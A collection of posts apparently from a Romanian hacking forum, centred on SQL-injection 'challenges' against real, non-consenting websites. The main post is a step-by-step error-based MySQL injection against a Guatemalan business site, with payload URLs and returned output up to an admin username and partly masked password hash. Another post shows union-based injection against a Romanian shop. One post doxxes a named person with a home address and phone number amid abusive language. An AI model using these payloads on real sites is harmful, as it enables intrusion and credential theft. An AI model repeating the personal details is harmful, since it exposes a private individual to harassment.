Sheyken

Nu am putut face un videoclip, insa m-am gandit ca ar fi frumos sa va crizati alaturi de mine in timp ce incercam sa facem injectia de aici: http://trysqlinjection.com/lv3.php?id=1 ***Atentie*** Contine continut vulgar, manelist & "Costinestist". Special thanks for DarkyAngel. Edit: Daca reusesti sa scoti versiunea, dami PM ! [ anybody ]

I can't do the injection, maybe it's POST Injection, in POST injection i'm begginer. Fuck it !

Ne pisam pe metinu tau si pe morti tai. Name:Matei Bogdan Street1:Str. Constructorului, Nr. 8 City:Petrosani State/Province:Hunedoara Postal Code:332029 Phone:+40.073293404 Cineva din hunedoara?

Intreabal pe dom' parinte Nemessis, el e cu "spovediri-le" nu noi.

Am putea face un WAF ?

Hai sa mergem toti 3 sa ne placa la toti 3

Am spus sa o faceti in UNION BASED. Tu imi dai in PM blind si spui ca nu e union based?

*************************** (+)Target: The San Antonio Auto & Truck Show (+)Document: MySQL Injection (+)Method: Union Based *************************** Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: shaggi. - Union Based ZeroCold - Union Based with Hex Sho0ter - Union Based totti93 - Union Based Sweby - Union Based ... Will be edited. Multumiri speciale lui denjacker pentru link, sa nu te prind ca postezi vreo imagine ca te crap.

Challenge Closed. Result: www.trysqlinjection.com/Injections/MySQLInjection

[+] Target : Export Related Service Companies - Oportunidad de Negocios en L?nea - Guatemala [+] Document : MySQL Injection Error based -------------------------------------------- 1. Pentru aflarea versiuni aveti nevoie de urmatorul query: [b][i]or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+[/i][/b] In cazul meu va fii: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+ Duplicate entry '5.1.61~1' for key 'group_key' 2. Pentru aflarea bazei de date aveti nevoie de urmatorul query: [COLOR="#40E0D0"] [b][i]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR] In cazul meu va fii: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Duplicate entry 'aw_negocio~1' for key 'group_key' 3. Pentru a Extrage tabelele din baza aw_negocio aveti nevoie de urmatorul query: [COLOR="#40E0D0"][b][i] and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0xHex Baza de date. [b][u][color=#FF0000]limit 0,1[/color][/u][/b]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR] Duplicate entry 'admin_log_users~1' for key 'group_key' Poate va intrebati de ce am subliniat "limit 0,1", ei bine raspunsul este: Prin limit 0,1 lvom primi un singur tabel, cel de sus ^ admin_log_users, pentru a trece in urmatorul tabel v-a trebui sa facem o mica modificare la query: and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x 61775f6e65676f63696f [b][color=#FF0000]limit 1,1[/color][/b]),floor(rand(0)*2))x from information_schema.tables group by x)a) Urmatorul tabel: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x61775f6e65676f63696f limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Duplicate entry 'admin_menu~1' for key 'group_key' Urmatorul tabel: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Duplicate entry 'admin_users~1' for key 'group_key' 4. Extragerea coloanelor din tabelul admin_users: Aveti nevoie de urmatorul Query: [COLOR="#40E0D0"][b][i] and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=[color=#FF0000]0xHexu tabelului respectiv[/color] [ admin_users ] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR] In cazul meu: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 61646d696e5f7573657273 = admin_users [HEX] ---------------------------------- Prima coloana din tabelul admin_users: Duplicate entry 'id_users~1' for key 'group_key' Query: [B][I][COLOR="#40E0D0"]and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 0,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/COLOR][/I][/B] A 2 a coloana din tabelul admin_users: Duplicate entry 'id_level~1' for key 'group_key' Query: [I][B][COLOR="#40E0D0"]and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 1,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/COLOR][/B][/I] A 3 a coloana din tabelul admin_users: Duplicate entry 'login~1' for key 'group_key' Query: and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 2,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a) A 4 a coloana din tabelul admin_users: Duplicate entry 'password~1' for key 'group_key' Query: and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 3,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a) 5. Extragerea datelor din coloanele login & password: Aveti nevoie de urmatorul Query: [b][i]and (select 1 from (select count(*),concat((select(select concat(cast(concat(Coloana,0x7e,Coloana) as char),0x7e)) from Baza.Tabel limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) [/i][/b] In cazul meu: http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(concat([color=#FF0000]login[/color],0x7e,[color=#FF0000]password[/color]) as char),0x7e)) from [color=#FF0000]aw_negocio[/color].[color=#FF0000]admin_users[/color] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Duplicate entry 'admin~$1$azig*********PrLWU4KWNhZ//LKIm/~1' for key 'group_key' User: admin Password: $1$azig*********PrLWU4KWNhZ//LKIm/ ---------------------------------- Sheyken - Romanian Security Team ----------------------------------

O mica chestie, cand omu' te cauta tu nu raspunzi, cand nu te cauta raspunzi. Ce-i cu tine ma?

Multi dintre noi am intalnit aceasta problema. As dori sa va explic pe scurt de ce apare aceasta erroare si de ce trebuie sa ne folosim de: [COLOR="#00FF00"]unhex(hex([/COLOR] atunci cand apare aceasta erroare: [COLOR="#00FF00"]Illegal mix of collations for operation 'UNION'[/COLOR] M-am gandit ca ar fi interesanta explicatia la aceasta intreba. (Pe scurt) Definitia "collate-ului": Collate-ul este modul in care a fost scrisa o coloana din baza de date cu un anumit tip de encoding exemplu: LATIN1 1. Vom incepe de la 0, luam un site, exemplu: http://www.baronfishing.ro/produse.php?id=127 union all select 1,2,3,4-- coloana vulnerabila (disponibila) este 2. 2. Voi sari direct la erroarea "Illegal mix of collations.": http://www.baronfishing.ro/produse.php?id=127 UNION SELECT 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()-- select * from `cats` where `pid` = 127 UNION SELECT 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()--1271 - [COLOR="#00FF00"]Illegal mix of collations for operation 'UNION'[/COLOR] Ok, acum va intrebari: Ce p*m e cu erroarea asta? Explicatia: Prin "union all select 1,group_concat(table_name,0x3a),3,4 from information_schema.tables where table_schema=database()--" se selecteaza datele prin formatul encodat default [ UTF8 ]. In baza de date encoding-ul a fost scris in LATIN1 iar noi cand folosim "union all select bla bla..." se selecteaza in default [ UTF8 ] prin aceasta selectare "collationul" coloanei principal selectate cu cea de la union nu coincide, primul encoding cu al 2 lea. Multumiri speciale lui totti93 pentru link.

wtf ?

Flux Pavilion - I Can't Stop

Nu inteleg 2 chesti, ce-i cu semnatura ta? Si ce-i cu avataru' tau ?

denji, deabea astept sa vad ce vei face la challenge-urile de pe trysqlinjection.com :>

*************************** (+)Target: LumoPro: product (+)Document: MySQL Injection (+)Method: Union Based *************************** Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: totti93 - Union Based denjacker - - Sweby - Error based && Union Based neo.hapsis - Union Based ...Will be edited.

Challenge Closed. Result: Index of /Injections/MySQLInjection

Asta imi suna a: "Sparge parola de la rar, ca eu nu pot, nu stiu cum".

Asa omule, baga prafuri dinalea in tine pana i exploda. Cunosc un baiat lua prafuri timp de 2-3 ani, acum arata "musculos" dar se vede pe el ca e "artificial". Practic, SA DEFORMAT !.

Ce-a mai sigura solutie ar fi sa se inchida thread-u asta de cacat.

Plm deja e ceva "futut" la mijloc.

Cum mere salamu' in bara :> tza, cred ca o sa iau warn tza, pentru off topic tza.

Ba, da asta nu o fost bagat in puscarie ?!

Baieti, nu va suparati dar as avea nevoie si de sintaxe pentru a le pune in "mica culegere".